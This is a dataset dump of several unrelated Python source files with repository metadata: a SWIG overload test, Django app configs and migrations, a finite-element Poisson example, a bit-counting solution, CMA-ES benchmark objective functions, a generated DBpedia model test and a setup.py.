# everything put in a namespace
if (nsoverload("hi") != 1000):
raise RuntimeError, ("nsoverload()")
if (nsoverload(1) != 1010):
raise RuntimeError, ("nsoverload(int t)")
if (nsoverload(1, 1) != 1020):
raise RuntimeError, ("nsoverload(int t, const int &)")
if (nsoverload(1, "hello") != 1030):
raise RuntimeError, ("nsoverload(int t, const char *)")
if (nsoverload(k) != 1010):
raise RuntimeError, ("nsoverload(Klass t)")
if (nsoverload(k, k) != 1020):
raise RuntimeError, ("nsoverload(Klass t, const Klass &)")
if (nsoverload(k, "hello") != 1030):
raise RuntimeError, ("nsoverload(Klass t, const char *)")
if (nsoverload(10.0, "hi") != 1040):
raise RuntimeError, ("nsoverload(double t, const char *)")
if (nsoverload() != 1050):
raise RuntimeError, ("nsoverload(const char *)")
A_foo(1)
b = B()
b.foo(1)
| [
"[email protected]"
] | |
a45f8d01ea3d38c88df410debafde8bacda6c399 | fa8d47841322bec699cc7d507e94327b63ea4990 | /phonecall/apps.py | b8f64bbad6ab58535833538758addf946deb5d88 | [] | no_license | vitorh45/work-at-olist | f9fd988bd746ecab93ca94dbca70f5eb5ed5c24a | 9cc68f5faa29e8ac1ad061d83b6aae745e9404c7 | refs/heads/master | 2020-06-14T20:12:23.604161 | 2018-11-12T02:18:17 | 2018-11-12T02:18:17 | 75,351,575 | 0 | 0 | null | 2016-12-02T02:13:14 | 2016-12-02T02:13:14 | null | UTF-8 | Python | false | false | 93 | py | from django.apps import AppConfig
class PhonecallConfig(AppConfig):
name = 'phonecall'
| [
"[email protected]"
] | |
ff962c602c1f68d63c7883569742a8670659f422 | e6b45b6cc01a921c3cc510f1a5fff3074dd6b2dd | /example_update1/PoissonFEMWithRobinBC_example.py | 3ff8c61a39419d78d70757f91ba1ecd69df871af | [] | no_license | yoczhang/FEALPyExamples | 3bd339bd5f4576630f767a758da9590a1c068410 | 44d9acbecb528374bc67bba50c62711384228d39 | refs/heads/master | 2023-07-24T21:35:50.633572 | 2023-07-05T02:28:13 | 2023-07-05T02:28:13 | 208,667,003 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,646 | py | #!/usr/bin/env python3
#
import sys
import numpy as np
from scipy.sparse.linalg import spsolve
import matplotlib.pyplot as plt
import pyamg
from fealpy.functionspace import LagrangeFiniteElementSpace
from fealpy.boundarycondition import RobinBC
from fealpy.tools.show import showmultirate
p = int(sys.argv[1])
n = int(sys.argv[2])
maxit = int(sys.argv[3])
d = int(sys.argv[4])
if d == 2:
from fealpy.pde.poisson_2d import CosCosData as PDE
elif d == 3:
from fealpy.pde.poisson_3d import CosCosCosData as PDE
pde = PDE()
mesh = pde.init_mesh(n=n)
errorType = ['$|| u - u_h||_{\Omega,0}$',
'$||\\nabla u - \\nabla u_h||_{\Omega, 0}$'
]
errorMatrix = np.zeros((2, maxit), dtype=np.float)
NDof = np.zeros(maxit, dtype=np.float)
for i in range(maxit):
space = LagrangeFiniteElementSpace(mesh, p=p)
NDof[i] = space.number_of_global_dofs()
uh = space.function()
A = space.stiff_matrix()
F = space.source_vector(pde.source)
bc = RobinBC(space, pde.robin)
A, F = bc.apply(A, F)
#uh[:] = spsolve(A, F).reshape(-1)
ml = pyamg.ruge_stuben_solver(A)
uh[:] = ml.solve(F, tol=1e-12, accel='cg').reshape(-1)
errorMatrix[0, i] = space.integralalg.error(pde.solution, uh.value)
errorMatrix[1, i] = space.integralalg.error(pde.gradient, uh.grad_value)
if i < maxit-1:
mesh.uniform_refine()
if d == 2:
fig = plt.figure()
axes = fig.gca(projection='3d')
uh.add_plot(axes, cmap='rainbow')
elif d == 3:
print('The 3d function plot is not been implemented!')
showmultirate(plt, 0, NDof, errorMatrix, errorType, propsize=20)
plt.show()
| [
"[email protected]"
] | |
cea744c519951b1d792842fa074670506fc24208 | 760e1c14d056dd75958d367242c2a50e829ac4f0 | /bit/338_counting_bits.py | 81ff431da8a2934e28c5d1339ee654906a25b2a5 | [] | no_license | lawtech0902/py_imooc_algorithm | 8e85265b716f376ff1c53d0afd550470679224fb | 74550d68cd3fd2cfcc92e1bf6579ac3b8f31aa75 | refs/heads/master | 2021-04-26T22:54:42.176596 | 2018-09-23T15:45:22 | 2018-09-23T15:45:22 | 123,894,744 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,266 | py | # _*_ coding: utf-8 _*_
"""
__author__ = 'lawtech'
__date__ = '2018/9/3 下午4:25'
给定一个非负整数 num。对于 0 ≤ i ≤ num 范围中的每个数字 i ,计算其二进制数中的 1 的数目并将它们作为数组返回。
示例 1:
输入: 2
输出: [0,1,1]
示例 2:
输入: 5
输出: [0,1,1,2,1,2]
进阶:
给出时间复杂度为O(n*sizeof(integer))的解答非常容易。但你可以在线性时间O(n)内用一趟扫描做到吗?
要求算法的空间复杂度为O(n)。
你能进一步完善解法吗?要求在C++或任何其他语言中不使用任何内置函数(如 C++ 中的 __builtin_popcount)来执行此操作。
考虑二进制数的规律。[000,001,010,011,100,101,110,111],分别对应[0,1,2,3,4,5,6,7]。
从上述二进制数可以看出来,4-7的二进制数既是对0-3的二进制数的最高位从0变成1,也就是说后面的二进制数都是在之前所有二进制的最高位加一位1。
"""
class Solution:
def countBits(self, num):
"""
:type num: int
:rtype: List[int]
"""
res = [0]
for i in range(1, num + 1):
res.append(res[i & (i - 1)] + 1)
return res
if __name__ == '__main__':
print(Solution().countBits(5))
| [
"[email protected]"
] | |
8b13f453089664e22c9cd377339d493878b30f89 | 43e5441f74359d620be6f7f80c99622769ea9774 | /venv/Lib/site-packages/cma/fitness_functions2.py | b05afae699ea080bbdbf824990670620695da9b6 | [
"BSD-3-Clause"
] | permissive | 33Da/deeplearn_eassy | 96f1bd09fe3df907c650378215eb686e4ab2801e | 82d60c5ec3aec60822d68d13f11ef1320d0bba2e | refs/heads/master | 2023-02-07T15:02:00.202693 | 2021-01-05T05:03:22 | 2021-01-05T05:03:22 | 326,892,905 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,742 | py | # -*- coding: utf-8 -*-
"""versatile container for test objective functions.
For the time being this is probably best used like::
from cma.fitness_functions2 import ff
Tested with::
import cma, cma.fitness_functions2
cma.ff2 = cma.fitness_functions2
cma.ff2.__dict__
dff, dff2 = dir(cma.ff), dir(cma.ff2)
for f in dff2:
if f in dff and f not in ('BBOB', 'epslow',
'fun_as_arg') and not f.startswith('_'):
try:
getattr(cma.ff, f)(aa([1.,2,3])) == getattr(cma.ff2, f)(aa([1.,2,3]))
except:
try:
assert getattr(cma.ff, f)(aa([1.,2,3]), cma.ff.sphere)\
== getattr(cma.ff2, f)(aa([1.,2,3]), cma.ff2.sphere)
except:
assert all(getattr(cma.ff, f)(aa([1.,2,3]), cma.ff.sphere)
== getattr(cma.ff2, f)(aa([1.,2,3]), cma.ff2.sphere))
"""
from __future__ import (absolute_import, division, print_function,
) # unicode_literals, with_statement)
# from __future__ import collections.MutableMapping
# does not exist in future, otherwise Python 2.5 would work, since 0.91.01
__author__ = "Nikolaus Hansen"
from .utilities.python3for2 import *
del absolute_import, division, print_function
import numpy as np
# arange, cos, size, eye, inf, dot, floor, outer, zeros, linalg.eigh,
# sort, argsort, random, ones,...
from numpy import array, dot, isscalar, sum # sum is not needed
# from numpy import inf, exp, log, isfinite
# to access the built-in sum fct: ``__builtins__.sum`` or ``del sum``
# removes the imported sum and recovers the shadowed build-in
try: np.median([1,2,3,2]) # fails currently in pypy, also sigma_vec.scaling
except AttributeError:
def _median(x):
x = sorted(x)
if len(x) % 2:
return x[len(x) // 2]
return (x[len(x) // 2 - 1] + x[len(x) // 2]) / 2
np.median = _median
from .utilities.utils import rglen as _rglen
# $Source$ # according to PEP 8 style guides, but what is it good for?
# $Id: fitness_functions.py 4150 2015-03-20 13:53:36Z hansen $
# bash $: svn propset svn:keywords 'Date Revision Id' fitness_functions.py
from . import bbobbenchmarks as BBOB
from .fitness_transformations import rotate #, ComposedFunction, Function
def _iqr(x):
x = sorted(x)
i1 = int(len(x) / 4)
i3 = int(3*len(x) / 4)
return x[i3] - x[i1]
def somenan(x, fun, p=0.1):
"""returns sometimes np.NaN, otherwise fun(x)"""
if np.random.rand(1) < p:
return np.NaN
else:
return fun(x)
def epslow(fun, eps=1e-7, Neff=lambda x: int(len(x)**0.5)):
return lambda x: fun(x[:Neff(x)]) + eps * np.mean(x**2)
def rand(x):
"""Random test objective function"""
return np.random.random(1)[0]
def linear(x):
return -x[0]
def lineard(x):
if 1 < 3 and any(array(x) < 0):
return np.nan
if 1 < 3 and sum([(10 + i) * x[i] for i in _rglen(x)]) > 50e3:
return np.nan
return -sum(x)
def sphere(x):
"""Sphere (squared norm) test objective function"""
# return np.random.rand(1)[0]**0 * sum(x**2) + 1 * np.random.rand(1)[0]
return sum((x + 0)**2)
def subspace_sphere(x, visible_ratio=1/2):
"""
"""
# here we could use an init function, that is this would
# preferably be a class
m = int(visible_ratio * len(x) + 1)
x = np.asarray(x)[np.random.permutation(len(x))[:m]]
return sum(x**2)
def pnorm(x, p=0.5):
return sum(np.abs(x)**p)**(1./p)
def grad_sphere(x, *args):
return 2*array(x, copy=False)
def grad_to_one(x, *args):
return array(x, copy=False) - 1
def sphere_pos(x):
"""Sphere (squared norm) test objective function"""
# return np.random.rand(1)[0]**0 * sum(x**2) + 1 * np.random.rand(1)[0]
c = 0.0
if x[0] < c:
return np.nan
return -c**2 + sum((x + 0)**2)
def spherewithoneconstraint(x):
return sum((x + 0)**2) if x[0] > 1 else np.nan
def elliwithoneconstraint(x, idx=[-1]):
return ellirot(x) if all(array(x)[idx] > 1) else np.nan
def spherewithnconstraints(x):
return sum((x + 0)**2) if all(array(x) > 1) else np.nan
# zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz
def noisysphere(x, noise=2.10e-9, cond=1.0, noise_offset=0.10):
"""noise=10 does not work with default popsize, ``cma.NoiseHandler(dimension, 1e7)`` helps"""
return elli(x, cond=cond) * np.exp(0 + noise * np.random.randn() / len(x)) + noise_offset * np.random.rand()
def spherew(x):
"""Sphere (squared norm) with sum x_i = 1 test objective function"""
# return np.random.rand(1)[0]**0 * sum(x**2) + 1 * np.random.rand(1)[0]
# s = sum(abs(x))
# return sum((x/s+0)**2) - 1/len(x)
# return sum((x/s)**2) - 1/len(x)
return -0.01 * x[0] + abs(x[0])**-2 * sum(x[1:]**2)
def epslowsphere(x, eps=1e-7, Neff=lambda x: int(len(x)**0.5)):
"""TODO: define as wrapper"""
return np.mean(x[:Neff(x)]**2) + eps * np.mean(x**2)
def partsphere(x):
"""Sphere (squared norm) test objective function"""
partsphere.evaluations += 1
# return np.random.rand(1)[0]**0 * sum(x**2) + 1 * np.random.rand(1)[0]
dim = len(x)
x = array([x[i % dim] for i in range(2 * dim)])
N = 8
i = partsphere.evaluations % dim
# f = sum(x[i:i + N]**2)
f = sum(x[np.random.randint(dim, size=N)]**2)
return f
partsphere.evaluations = 0
def sectorsphere(x):
"""asymmetric Sphere (squared norm) test objective function"""
return sum(x**2) + (1e6 - 1) * sum(x[x < 0]**2)
def cornersphere(x):
"""Sphere (squared norm) test objective function constraint to the corner"""
nconstr = len(x) - 0
if any(x[:nconstr] < 1):
return np.NaN
return sum(x**2) - nconstr
def cornerelli(x):
""" """
if any(x < 1):
return np.NaN
return elli(x) - elli(np.ones(len(x)))
def cornerellirot(x):
""" """
if any(x < 1):
return np.NaN
return ellirot(x)
def normalSkew(f):
N = np.random.randn(1)[0]**2
if N < 1:
N = f * N # diminish blow up lower part
return N
def noiseC(x, func=sphere, fac=10, expon=0.8):
f = func(x)
N = np.random.randn(1)[0] / np.random.randn(1)[0]
return max(1e-19, f + (float(fac) / len(x)) * f**expon * N)
def noise(x, func=sphere, fac=10, expon=1):
f = func(x)
# R = np.random.randn(1)[0]
R = np.log10(f) + expon * abs(10 - np.log10(f)) * np.random.rand(1)[0]
# sig = float(fac)/float(len(x))
# R = log(f) + 0.5*log(f) * random.randn(1)[0]
# return max(1e-19, f + sig * (f**np.log10(f)) * np.exp(R))
# return max(1e-19, f * np.exp(sig * N / f**expon))
# return max(1e-19, f * normalSkew(f**expon)**sig)
return f + 10**R # == f + f**(1+0.5*RN)
def cigar(x, rot=0, cond=1e6, noise=0):
"""Cigar test objective function"""
if rot:
x = rotate(x)
x = [x] if isscalar(x[0]) else x # scalar into list
f = [(x[0]**2 + cond * sum(x[1:]**2)) * np.exp(noise * np.random.randn(1)[0] / len(x)) for x in x]
return f if len(f) > 1 else f[0] # 1-element-list into scalar
def grad_cigar(x, *args):
grad = 2 * 1e6 * np.array(x)
grad[0] /= 1e6
return grad
def diagonal_cigar(x, cond=1e6):
axis = np.ones(len(x)) / len(x)**0.5
proj = dot(axis, x) * axis
s = sum(proj**2)
s += cond * sum((x - proj)**2)
return s
def tablet(x, cond=1e6, rot=0):
"""Tablet test objective function"""
x = np.asarray(x)
if rot and rot is not tablet:
x = rotate(x)
x = [x] if isscalar(x[0]) else x # scalar into list
f = [cond * x[0]**2 + sum(x[1:]**2) for x in x]
return f if len(f) > 1 else f[0] # 1-element-list into scalar
def grad_tablet(x, *args):
grad = 2 * np.array(x)
grad[0] *= 1e6
return grad
def cigtab(y):
"""Cigtab test objective function"""
X = [y] if isscalar(y[0]) else y
f = [1e-4 * x[0]**2 + 1e4 * x[1]**2 + sum(x[2:]**2) for x in X]
return f if len(f) > 1 else f[0]
def cigtab2(x, condition=1e8, n_axes=None, n_short_axes=None):
"""cigtab with 5% long and short axes.
`n_axes: int`, if not `None`, sets the number of long axes to
`n_axes` and also the number of short axes if `n_short_axes` is
`None`.
"""
m = n_axes
if m is None:
m = max((1, int(0.05 * (len(x) + 1./2))))
ms = n_short_axes
if ms is None:
ms = m
x = np.asarray(x)
f = sum(x[m:-ms]**2)
f += condition**-0.5 * sum(x[:m]**2)
f += condition**0.5 * sum(x[-ms:]**2)
return f
def twoaxes(y):
"""Cigtab test objective function"""
X = [y] if isscalar(y[0]) else y
N2 = len(X[0]) // 2
f = [1e6 * sum(x[0:N2]**2) + sum(x[N2:]**2) for x in X]
return f if len(f) > 1 else f[0]
def ellirot(x):
return elli(array(x), 1)
def hyperelli(x):
N = len(x)
return sum((np.arange(1, N + 1) * x)**2)
def halfelli(x):
l = len(x) // 2
felli = elli(x[:l])
return felli + 1e-8 * sum(x[l:]**2)
def elli(x, rot=0, xoffset=0, cond=1e6, actuator_noise=0.0, both=False):
"""Ellipsoid test objective function"""
x = np.asarray(x)
if not isscalar(x[0]): # parallel evaluation
return [elli(xi, rot) for xi in x] # could save 20% overall
if rot:
x = rotate(x)
N = len(x)
if actuator_noise:
x = x + actuator_noise * np.random.randn(N)
ftrue = sum(cond**(np.arange(N) / (N - 1.)) * (x + xoffset)**2) \
if N > 1 else (x + xoffset)**2
alpha = 0.49 + 1. / N
beta = 1
felli = np.random.rand(1)[0]**beta * ftrue * \
max(1, (10.**9 / (ftrue + 1e-99))**(alpha * np.random.rand(1)[0]))
# felli = ftrue + 1*np.random.randn(1)[0] / (1e-30 +
# np.abs(np.random.randn(1)[0]))**0
if both:
return (felli, ftrue)
else:
# return felli # possibly noisy value
return ftrue # + np.random.randn()
def grad_elli(x, *args):
cond = 1e6
N = len(x)
return 2 * cond**(np.arange(N) / (N - 1.)) * array(x, copy=False)
def fun_as_arg(x, *args):
"""``fun_as_arg(x, fun, *more_args)`` calls ``fun(x, *more_args)``.
Use case::
fmin(cma.fun_as_arg, args=(fun,), gradf=grad_numerical)
calls fun_as_args(x, args) and grad_numerical(x, fun, args=args)
"""
fun = args[0]
more_args = args[1:] if len(args) > 1 else ()
return fun(x, *more_args)
def grad_numerical(x, func, epsilon=None):
"""symmetric gradient"""
eps = 1e-8 * (1 + abs(x)) if epsilon is None else epsilon
grad = np.zeros(len(x))
ei = np.zeros(len(x)) # float is 1.6 times faster than int
for i in _rglen(x):
ei[i] = eps[i]
grad[i] = (func(x + ei) - func(x - ei)) / (2*eps[i])
ei[i] = 0
return grad
def elliconstraint(x, cfac=1e8, tough=True, cond=1e6):
"""ellipsoid test objective function with "constraints" """
N = len(x)
f = sum(cond**(np.arange(N)[-1::-1] / (N - 1)) * x**2)
cvals = (x[0] + 1,
x[0] + 1 + 100 * x[1],
x[0] + 1 - 100 * x[1])
if tough:
f += cfac * sum(max(0, c) for c in cvals)
else:
f += cfac * sum(max(0, c + 1e-3)**2 for c in cvals)
return f
def rosen(x, alpha=1e2):
"""Rosenbrock test objective function"""
x = [x] if isscalar(x[0]) else x # scalar into list
x = np.asarray(x)
f = [sum(alpha * (x[:-1]**2 - x[1:])**2 + (1. - x[:-1])**2) for x in x]
return f if len(f) > 1 else f[0] # 1-element-list into scalar
def grad_rosen(x, *args):
N = len(x)
grad = np.zeros(N)
grad[0] = 2 * (x[0] - 1) + 200 * (x[1] - x[0]**2) * -2 * x[0]
i = np.arange(1, N - 1)
grad[i] = 2 * (x[i] - 1) - 400 * (x[i+1] - x[i]**2) * x[i] + 200 * (x[i] - x[i-1]**2)
grad[N-1] = 200 * (x[N-1] - x[N-2]**2)
return grad
def rosen_chained(x, alpha=1e2):
x = [x] if isscalar(x[0]) else x # scalar into list
f = [(1. - x[0])**2 + sum(alpha * (x[:-1]**2 - x[1:])**2) for x in x]
return f if len(f) > 1 else f[0] # 1-element-list into scalar
def diffpow(x, rot=0):
"""Diffpow test objective function"""
N = len(x)
if rot:
x = rotate(x)
return sum(np.abs(x)**(2. + 4.*np.arange(N) / (N - 1.)))**0.5
def rosenelli(x):
N = len(x)
Nhalf = int((N + 1) / 2)
return rosen(x[:Nhalf]) + elli(x[Nhalf:], cond=1)
def ridge(x, expo=2):
x = [x] if isscalar(x[0]) else x # scalar into list
f = [x[0] + 100 * np.sum(x[1:]**2)**(expo / 2.) for x in x]
return f if len(f) > 1 else f[0] # 1-element-list into scalar
def ridgecircle(x, expo=0.5):
"""happy cat by HG Beyer"""
a = len(x)
s = sum(x**2)
return ((s - a)**2)**(expo / 2) + s / a + sum(x) / a
def happycat(x, alpha=1. / 8):
s = sum(x**2)
return ((s - len(x))**2)**alpha + (s / 2 + sum(x)) / len(x) + 0.5
def flat(x):
return 1
return 1 if np.random.rand(1) < 0.9 else 1.1
return np.random.randint(1, 30)
def ackley(x):
"""default domain is ``[-32.768, 32.768]^n``"""
x = np.asarray(x)
a, b = 20, 0.2
s = np.exp(-b * np.sqrt(np.mean(x**2)))
scos = np.exp(np.mean(np.cos(2 * np.pi * x)))
return a * (1 - s) + (np.exp(1) - scos)
def branin(x):
# in [0,15]**2
y = x[1]
x = x[0] + 5
return (y - 5.1 * x**2 / 4 / np.pi**2 + 5 * x / np.pi - 6)**2 + 10 * (1 - 1 / 8 / np.pi) * np.cos(x) + 10 - 0.397887357729738160000
def goldsteinprice(x):
x1 = x[0]
x2 = x[1]
return (1 + (x1 + x2 + 1)**2 * (19 - 14 * x1 + 3 * x1**2 - 14 * x2 + 6 * x1 * x2 + 3 * x2**2)) * (
30 + (2 * x1 - 3 * x2)**2 * (18 - 32 * x1 + 12 * x1**2 + 48 * x2 - 36 * x1 * x2 + 27 * x2**2)) - 3
def griewank(x):
# was in [-600 600]
x = (600. / 5) * x
return 1 - np.prod(np.cos(x / np.sqrt(1. + np.arange(len(x))))) + sum(x**2) / 4e3
def rastrigin(x):
"""Rastrigin test objective function"""
if not isscalar(x[0]):
N = len(x[0])
return [10 * N + sum(xi**2 - 10 * np.cos(2 * np.pi * xi)) for xi in x]
# return 10*N + sum(x**2 - 10*np.cos(2*np.pi*x), axis=1)
N = len(x)
return 10 * N + sum(x**2 - 10 * np.cos(2 * np.pi * x))
def schaffer(x):
""" Schaffer function x0 in [-100..100]"""
N = len(x)
s = x[0:N - 1]**2 + x[1:N]**2
return sum(s**0.25 * (np.sin(50 * s**0.1)**2 + 1))
def schwefelelli(x):
s = 0
f = 0
for i in _rglen(x):
s += x[i]
f += s**2
return f
def schwefelmult(x, pen_fac=1e4):
"""multimodal Schwefel function with domain -500..500"""
y = [x] if isscalar(x[0]) else x
N = len(y[0])
f = array([418.9829 * N - 1.27275661e-5 * N - sum(x * np.sin(np.abs(x)**0.5))
+ pen_fac * sum((abs(x) > 500) * (abs(x) - 500)**2) for x in y])
return f if len(f) > 1 else f[0]
def schwefel2_22(x):
"""Schwefel 2.22 function"""
return sum(np.abs(x)) + np.prod(np.abs(x))
def optprob(x):
n = np.arange(len(x)) + 1
f = n * x * (1 - x)**(n - 1)
return sum(1 - f)
def lincon(x, theta=0.01):
"""ridge like linear function with one linear constraint"""
if x[0] < 0:
return np.NaN
return theta * x[1] + x[0]
def rosen_nesterov(x, rho=100):
"""needs exponential number of steps in a non-increasing
f-sequence.
x_0 = (-1,1,...,1)
See Jarre (2011) "On Nesterov's Smooth Chebyshev-Rosenbrock
Function"
"""
f = 0.25 * (x[0] - 1)**2
f += rho * sum((x[1:] - 2 * x[:-1]**2 + 1)**2)
return f
def powel_singular(x):
# ((8 * np.sin(7 * (x[i] - 0.9)**2)**2 ) + (6 * np.sin()))
res = np.sum((x[i - 1] + 10 * x[i])**2 + 5 * (x[i + 1] - x[i + 2])**2 +
(x[i] - 2 * x[i + 1])**4 + 10 * (x[i - 1] - x[i + 2])**4
for i in range(1, len(x) - 2))
return 1 + res
def styblinski_tang(x):
"""in [-5, 5]
found also in Lazar and Jarre 2016, optimum in f(-2.903534...)=0
"""
# x_opt = N * [-2.90353402], seems to have essentially
# (only) 2**N local optima
return (39.1661657037714171054273576010019 * len(x))**1 + \
sum(x**4 - 16 * x**2 + 5 * x) / 2
def trid(x):
return sum((x-1)**2) - sum(x[:-1] * x[1:])
def bukin(x):
"""Bukin function from Wikipedia, generalized simplistically from 2-D.
http://en.wikipedia.org/wiki/Test_functions_for_optimization"""
s = 0
for k in range((1+len(x)) // 2):
z = x[2 * k]
y = x[min((2*k + 1, len(x)-1))]
s += 100 * np.abs(y - 0.01 * z**2)**0.5 + 0.01 * np.abs(z + 10)
return s
def zerosum(x):
"""abs(sum xi) has an n-1 dimensionsal solution space.
http://infinity77.net/global_optimization/test_functions_nd_Z.html#go_benchmark.ZeroSum
https://github.com/CMA-ES/c-cmaes/issues/19#issue-323799789
"""
s = np.sum(x)
return 1 + 1e2 * np.abs(s)**0.5 if s else 0.0 | [
"[email protected]"
] | |
dc12825f1785f0eceb733db879c05efe907c1ac8 | e912af291e1457c61606642f1c7700e678c77a27 | /python/532_k-diff_pairs_in_an_array.py | b3078a0372260afbe3f7744d4defba6a128add92 | [] | no_license | MakrisHuang/LeetCode | 325be680f8f67b0f34527914c6bd0a5a9e62e9c9 | 7609fbd164e3dbedc11308fdc24b57b5097ade81 | refs/heads/master | 2022-08-13T12:13:35.003830 | 2022-07-31T23:03:03 | 2022-07-31T23:03:03 | 128,767,837 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 282 | py | class Solution:
def findPairs(self, nums: List[int], k: int) -> int:
if k > 0:
return len(set(nums) & set(n + k for n in nums))
elif k == 0:
return sum(v > 1 for v in collections.Counter(nums).values())
else:
return 0
| [
"[email protected]"
] | |
3b7afc565fc2ff0482cafb249736d156f6f05efc | 59166105545cdd87626d15bf42e60a9ee1ef2413 | /test/test_ice_hockey_league.py | c6490a78cce2303eb5bfa685c644b362d39686a4 | [] | no_license | mosoriob/dbpedia_api_client | 8c594fc115ce75235315e890d55fbf6bd555fa85 | 8d6f0d04a3a30a82ce0e9277e4c9ce00ecd0c0cc | refs/heads/master | 2022-11-20T01:42:33.481024 | 2020-05-12T23:22:54 | 2020-05-12T23:22:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,309 | py | # coding: utf-8
"""
DBpedia
This is the API of the DBpedia Ontology # noqa: E501
The version of the OpenAPI document: v0.0.1
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import dbpedia
from dbpedia.models.ice_hockey_league import IceHockeyLeague # noqa: E501
from dbpedia.rest import ApiException
class TestIceHockeyLeague(unittest.TestCase):
"""IceHockeyLeague unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test IceHockeyLeague
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = dbpedia.models.ice_hockey_league.IceHockeyLeague() # noqa: E501
if include_optional :
return IceHockeyLeague(
viaf_id = [
'0'
],
leader_function = [
None
],
art_patron = [
None
],
manager_season = [
None
],
secretary_general = [
None
],
number_of_locations = [
56
],
discipline = [
None
],
type = [
'0'
],
revenue = [
1.337
],
affiliation = [
None
],
season = [
None
],
id = '0',
nla_id = [
'0'
],
chairperson = [
None
],
region_served = [
None
],
superintendent = [
None
],
formation_date = [
'0'
],
number_of_employees = [
56
],
extinction_date = [
'0'
],
player_season = [
None
],
endowment = [
1.337
],
number_of_teams = [
56
],
slogan = [
'0'
],
regional_council = [
None
],
location_city = [
None
],
number_of_volunteers = [
56
],
ideology = [
None
],
description = [
'0'
],
membership = [
'0'
],
ceo = [
None
],
formation_year = [
'0'
],
junior_season = [
None
],
headquarter = [
None
],
extinction_year = [
'0'
],
child_organisation = [
None
],
honours = [
None
],
parent_organisation = [
None
],
organisation_member = [
None
],
number_of_staff = [
56
],
product = [
None
],
hometown = [
None
],
foundation_place = [
None
],
national_selection = [
None
],
current_season = [
'0'
],
label = [
'0'
],
legal_form = [
None
],
general_council = [
None
],
trustee = [
None
],
age = [
56
],
main_organ = [
None
]
)
else :
return IceHockeyLeague(
)
def testIceHockeyLeague(self):
"""Test IceHockeyLeague"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
ccd797d9bd113bf5dbade1cb215f77a6a5b3b320 | 9d40c348e256bd74455521a7a11d8a4ab5d0d9f0 | /setup.py | b88fc0a1a902044454101d52320b623ab903dd99 | [] | no_license | tianon/etest | acf5bd2f06cf9a5024353cfc8128c3e968b889c2 | 01f24e46caaa3c75c48c43e59a8c03da81e06e3b | refs/heads/master | 2021-01-17T20:11:43.244552 | 2015-05-03T15:10:06 | 2015-05-03T15:10:33 | 36,564,139 | 0 | 0 | null | 2015-05-30T15:38:31 | 2015-05-30T15:38:31 | null | UTF-8 | Python | false | false | 2,447 | py | # Copyright (C) 2014 by Alex Brandt <[email protected]>
#
# etest is freely distributable under the terms of an MIT-style license.
# See COPYING or http://www.opensource.org/licenses/mit-license.php.
import os
from setuptools import setup, find_packages
from codecs import open
with open(os.path.join('etest', 'information.py'), 'r', encoding = 'utf-8') as fh:
exec(fh.read(), globals(), locals())
PARAMS = {}
PARAMS['name'] = NAME # flake8: noqa — provided by exec
PARAMS['version'] = VERSION # flake8: noqa — provided by exec
PARAMS['description'] = DESCRIPTION # flake8: noqa — provided by exec
with open('README.rst', 'r', encoding = 'utf-8') as fh:
PARAMS['long_description'] = fh.read()
PARAMS['url'] = URL # flake8: noqa — provided by exec
PARAMS['author'] = AUTHOR # flake8: noqa — provided by exec
PARAMS['author_email'] = AUTHOR_EMAIL # flake8: noqa — provided by exec
PARAMS['license'] = LICENSE # flake8: noqa — provided by exec
PARAMS['classifiers'] = [
'Development Status :: 3 - Alpha',
# 'Development Status :: 4 - Beta',
# 'Development Status :: 5 - Production/Stable',
# 'Development Status :: 6 - Mature',
# 'Development Status :: 7 - Inactive',
'Environment :: Console',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Quality Assurance',
'Topic :: Software Development :: Testing',
'Topic :: Utilities',
]
PARAMS['keywords'] = [
'ebuild',
'test',
'gentoo',
'portage',
'emerge',
]
PARAMS['packages'] = find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"])
PARAMS['package_data'] = {
'etest.parsers': [ 'bash.p' ],
}
PARAMS['install_requires'] = [
'click',
'docker-py',
'ply',
]
PARAMS['test_suite'] = 'nose.collector'
PARAMS['tests_require'] = [
'coverage'
'nose',
]
PARAMS['entry_points'] = {
'console_scripts': [
'etest = etest:etest',
],
}
PARAMS['data_files'] = [
('share/doc/{P[name]}-{P[version]}'.format(P = PARAMS), [
'README.rst',
]),
]
setup(**PARAMS)
| [
"[email protected]"
] | |
449664c6a652f208251835430b04392c9f31857d | 457d07994582657539a52d2fe8b7c24557ecc1fb | /service10/migrations/0003_auto_20190201_0630.py | 0bcec6dd58bbb0c6baf0b78d282f64a82370ca3c | [] | no_license | ohsehwan/django_admin_nanum | 952c91452697f1ee7718449ceceaf4e434c3da27 | 0478389d3a44592fd2ee6f025f2b4a66c1a2176e | refs/heads/master | 2022-12-23T01:18:58.124355 | 2019-06-21T07:42:49 | 2019-06-21T07:42:49 | 168,487,820 | 3 | 1 | null | 2022-12-08T01:02:50 | 2019-01-31T08:11:59 | JavaScript | UTF-8 | Python | false | false | 597 | py | # Generated by Django 2.1.5 on 2019-02-01 06:30
import ckeditor.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('service10', '0002_mentor'),
]
operations = [
migrations.CreateModel(
name='article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('html', ckeditor.fields.RichTextField()),
],
),
migrations.DeleteModel(
name='mentor',
),
]
| [
"[email protected]"
] | |
55f57819c1d4758954960879bf878e26885de0ae | e992b76761d2cc95e55d8c21f78f9636b0f74aae | /caches/__init__.py | 1611d10b35c4da8ec7150bb0321420534a499a69 | [
"MIT"
